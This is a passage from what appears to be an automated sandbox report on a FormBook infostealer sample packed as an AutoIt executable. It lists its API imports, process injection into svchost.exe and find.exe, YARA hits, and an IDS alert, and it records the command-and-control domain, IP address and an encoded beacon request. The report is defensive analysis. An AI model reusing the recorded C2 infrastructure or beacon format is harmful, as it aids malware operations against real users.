HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T15:34:39.124859+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49887	23.167.152.41	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 15:34:38.740014076 CET	49887	80	192.168.2.6	23.167.152.41
Jan 10, 2025 15:34:38.744905949 CET	80	49887	23.167.152.41	192.168.2.6
Jan 10, 2025 15:34:38.745012999 CET	49887	80	192.168.2.6	23.167.152.41
Jan 10, 2025 15:34:38.753057957 CET	49887	80	192.168.2.6	23.167.152.41
Jan 10, 2025 15:34:38.757930040 CET	80	49887	23.167.152.41	192.168.2.6
Jan 10, 2025 15:34:39.124737024 CET	80	49887	23.167.152.41	192.168.2.6
Jan 10, 2025 15:34:39.124859095 CET	49887	80	192.168.2.6	23.167.152.41
Jan 10, 2025 15:34:39.126290083 CET	49887	80	192.168.2.6	23.167.152.41
Jan 10, 2025 15:34:39.131119967 CET	80	49887	23.167.152.41	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 15:34:37.925976992 CET	54860	53	192.168.2.6	1.1.1.1
Jan 10, 2025 15:34:38.733728886 CET	53	54860	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 15:34:37.925976992 CET	192.168.2.6	1.1.1.1	0xd13c	Standard query (0)	www.39978.club	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 15:34:38.733728886 CET	1.1.1.1	192.168.2.6	0xd13c	No error (0)	www.39978.club	uaslkd.skasdhu.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 15:34:38.733728886 CET	1.1.1.1	192.168.2.6	0xd13c	No error (0)	uaslkd.skasdhu.huhusddfnsuegcdn.com	gtml.huksa.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 15:34:38.733728886 CET	1.1.1.1	192.168.2.6	0xd13c	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		23.167.152.41	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.39978.club

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49887	23.167.152.41	80	5828	C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:34:38.753057957 CET	477	OUT	GET /4bhh/?AL=qVEhfIHZC/LrType2rBHfLPSl0/OSjD2TKGEGSewNOQTw+ALrB9paARDDp1DVoSDqn+95aH9GG7zoH9yEvfJnsbSmi+QanCgKDCOHomg85rhBTVZOXML7PcqWYx+hLfm17lEWK4=&LNB=hTLpR848 HTTP/1.1 Host: www.39978.club Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2

Target ID:	0
Start time:	09:34:02
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\WDpjhC3jpq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\WDpjhC3jpq.exe"
Imagebase:	0x220000
File size:	1'212'928 bytes
MD5 hash:	E11751145ED9153735F2BFEFD5A2CE9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:34:03
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\WDpjhC3jpq.exe"
Imagebase:	0x600000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2351397025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2353464103.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2352214386.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:34:16
Start date:	10/01/2025
Path:	C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3375408223.0000000002AD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	09:34:18
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\find.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\find.exe"
Imagebase:	0x840000
File size:	14'848 bytes
MD5 hash:	15B158BC998EEF74CFDD27C44978AEA0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2592843183.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2592756925.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:34:30
Start date:	10/01/2025
Path:	C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3376817582.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	09:34:42
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	7.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	65

Executed Functions

Function 0024B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2714bd1be5d119c56c5869977598c9e6b3c2b428cfe9ef7d69987fcfbde33d8f
Instruction ID: b169a9b9fa0d10739703a12eaf8ce72119277c0f76e2fe1156126a108a351889
Opcode Fuzzy Hash: 2714bd1be5d119c56c5869977598c9e6b3c2b428cfe9ef7d69987fcfbde33d8f
Instruction Fuzzy Hash: F0327C75B222298BCB29CF54DC856E9B7B5FF4A310F1840D9E40AA7A81D7709E90CF52

Function 00223D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00223AA3,?), ref: 00223D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00223AA3,?), ref: 00223D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,002E1148,002E1130,?,?,?,?,00223AA3,?), ref: 00223DC8

Part of subcall function 00226430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00223DEE,002E1148,?,?,?,?,?,00223AA3,?), ref: 00226471

SetCurrentDirectoryW.KERNEL32(?,?,?,00223AA3,?), ref: 00223E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,002D28F4,00000010), ref: 00291CCE
SetCurrentDirectoryW.KERNEL32(?,002E1148,?,?,?,?,?,00223AA3,?), ref: 00291D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,002BDAB4,002E1148,?,?,?,?,?,00223AA3,?), ref: 00291D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00223AA3), ref: 00291D90

Part of subcall function 00223E6E: GetSysColorBrush.USER32(0000000F), ref: 00223E79
Part of subcall function 00223E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00223E88
Part of subcall function 00223E6E: LoadIconW.USER32(00000063), ref: 00223E9E
Part of subcall function 00223E6E: LoadIconW.USER32(000000A4), ref: 00223EB0
Part of subcall function 00223E6E: LoadIconW.USER32(000000A2), ref: 00223EC2
Part of subcall function 00223E6E: RegisterClassExW.USER32(?), ref: 00223F30

Part of subcall function 002236B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002236E6
Part of subcall function 002236B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00223707
Part of subcall function 002236B8: ShowWindow.USER32(00000000,?,?,?,?,00223AA3,?), ref: 0022371B
Part of subcall function 002236B8: ShowWindow.USER32(00000000,?,?,?,?,00223AA3,?), ref: 00223724

Part of subcall function 00224FFC: _memset.LIBCMT ref: 00225022
Part of subcall function 00224FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002250CB

Strings

()-, xrefs: 00291D49
runas, xrefs: 00291D84
This is a third-party compiled AutoIt script., xrefs: 00291CC8

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: ()-$This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-2138141747
Opcode ID: d120eee5c5191642c7f158aab814614907a24a91d03f1ff67df56d2e85da235e
Instruction ID: 09442e5c5bde1a6e49afd25f191d3929c04fd8dfb5c3ef03efdd700598c2598e
Opcode Fuzzy Hash: d120eee5c5191642c7f158aab814614907a24a91d03f1ff67df56d2e85da235e
Instruction Fuzzy Hash: 1E5108319642A5BACF11EBF0FC4AEED7B799F16700F004079F5066A1A2DA744A79CF21

Function 0023DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0023DDEC
GetCurrentProcess.KERNEL32(00000000,002BDC38,?,?), ref: 0023DEAC
GetNativeSystemInfo.KERNELBASE(?,002BDC38,?,?), ref: 0023DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 0023DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 0023DF1F
GetSystemInfo.KERNEL32(?,002BDC38,?,?), ref: 0023DF29
GetSystemInfo.KERNEL32(?,002BDC38,?,?), ref: 0023DF35

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: aed090afb0953e2594e7188f6d9db454341066ddccc6da143720077dc71b843c
Instruction ID: e9c65f9bdb8ef172c7712b24ac2728f1d36346970b2c398a5ec516944d6eed22
Opcode Fuzzy Hash: aed090afb0953e2594e7188f6d9db454341066ddccc6da143720077dc71b843c
Instruction Fuzzy Hash: 7561A2B182A385DBCF15CF68A8C11E97FB4AF29300F1949D9D8499F207C634CA19CB65

Function 0022406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0022449E,?,?,00000000,00000001), ref: 0022407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0022449E,?,?,00000000,00000001), ref: 00224092
LoadResource.KERNEL32(?,00000000,?,?,0022449E,?,?,00000000,00000001,?,?,?,?,?,?,002241FB), ref: 00294F1A
SizeofResource.KERNEL32(?,00000000,?,?,0022449E,?,?,00000000,00000001,?,?,?,?,?,?,002241FB), ref: 00294F2F
LockResource.KERNEL32(0022449E,?,?,0022449E,?,?,00000000,00000001,?,?,?,?,?,?,002241FB,00000000), ref: 00294F42

Strings

SCRIPT, xrefs: 00224088

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 821bff79eaae633b87a896057bf5b345ead22e187794f60797e95d8c4d731418
Instruction ID: 77314b17f764ff7bb8a33b391ccef32c793332059ff11c2468984793e87ca09e
Opcode Fuzzy Hash: 821bff79eaae633b87a896057bf5b345ead22e187794f60797e95d8c4d731418
Instruction Fuzzy Hash: 99117C70210711BFEB259B65EC48F677BB9EBCAB51F20416DF6028A6A0DB71DD40CA20

Function 00233B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON

Download Yara Rule

Strings

., xrefs: 002340EC
., xrefs: 002340A4
@, xrefs: 00234176
., xrefs: 0029701F

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @$ .$ .$ .
API String ID: 3728558374-4017904471
Opcode ID: 9b6f322982c324914567056ccc332c5690073e89c43ed5c6fc6fef2cc18b18fa
Instruction ID: a8127c262a40e60e5c49c10734e86b1d2035974cb58225071423900534db74b6
Opcode Fuzzy Hash: 9b6f322982c324914567056ccc332c5690073e89c43ed5c6fc6fef2cc18b18fa
Instruction Fuzzy Hash: 0D72AEB1E24209DFCF14EF94C481ABEB7B5EF48300F14805AED09AB251D775AE65CB91

Function 00266CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00292F49), ref: 00266CB9
FindFirstFileW.KERNELBASE(?,?), ref: 00266CCA
FindClose.KERNEL32(00000000), ref: 00266CDA

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 852fad07d7ebbf60bc6f1b916f3f78f30bb2d4a33646c5029a05cd8cf8b57f41
Instruction ID: a81ac12174a923be3f6749677fa91e3440400f3c2a27ce85179aea333c622cea
Opcode Fuzzy Hash: 852fad07d7ebbf60bc6f1b916f3f78f30bb2d4a33646c5029a05cd8cf8b57f41
Instruction Fuzzy Hash: 30E012318249155783106778EC0D4A9766CDA06339F104717F576C15D0EBA0995485D5

Function 00233200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON

Download Yara Rule

Strings

., xrefs: 0029933E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: BuffCharUpper
String ID: .
API String ID: 3964851224-2908995057
Opcode ID: 4124f1465072175beca6b34c45b894ac44d13cd52011f4a3531613ac24435ad4
Instruction ID: caa1e546819152f9022f97406723821bfc60fccc474ac9280b7c2f7fd100fc92
Opcode Fuzzy Hash: 4124f1465072175beca6b34c45b894ac44d13cd52011f4a3531613ac24435ad4
Instruction Fuzzy Hash: 33928BB0628341DFD724DF18C480B6AB7E5BF88304F14885DE98A8B352D775EEA5CB52

Function 0022E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0022E959
timeGetTime.WINMM ref: 0022EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0022ED2E
TranslateMessage.USER32(?), ref: 0022ED3F
DispatchMessageW.USER32(?), ref: 0022ED4A
LockWindowUpdate.USER32(00000000), ref: 0022ED79
DestroyWindow.USER32 ref: 0022ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0022ED9F
Sleep.KERNEL32(0000000A), ref: 00295270
TranslateMessage.USER32(?), ref: 002959F7
DispatchMessageW.USER32(?), ref: 00295A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00295A19

Strings

@GUI_WINHANDLE, xrefs: 00295360
@GUI_CTRLHANDLE, xrefs: 002953AC
@GUI_CTRLID, xrefs: 00295314
@TRAY_ID, xrefs: 002954C9

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
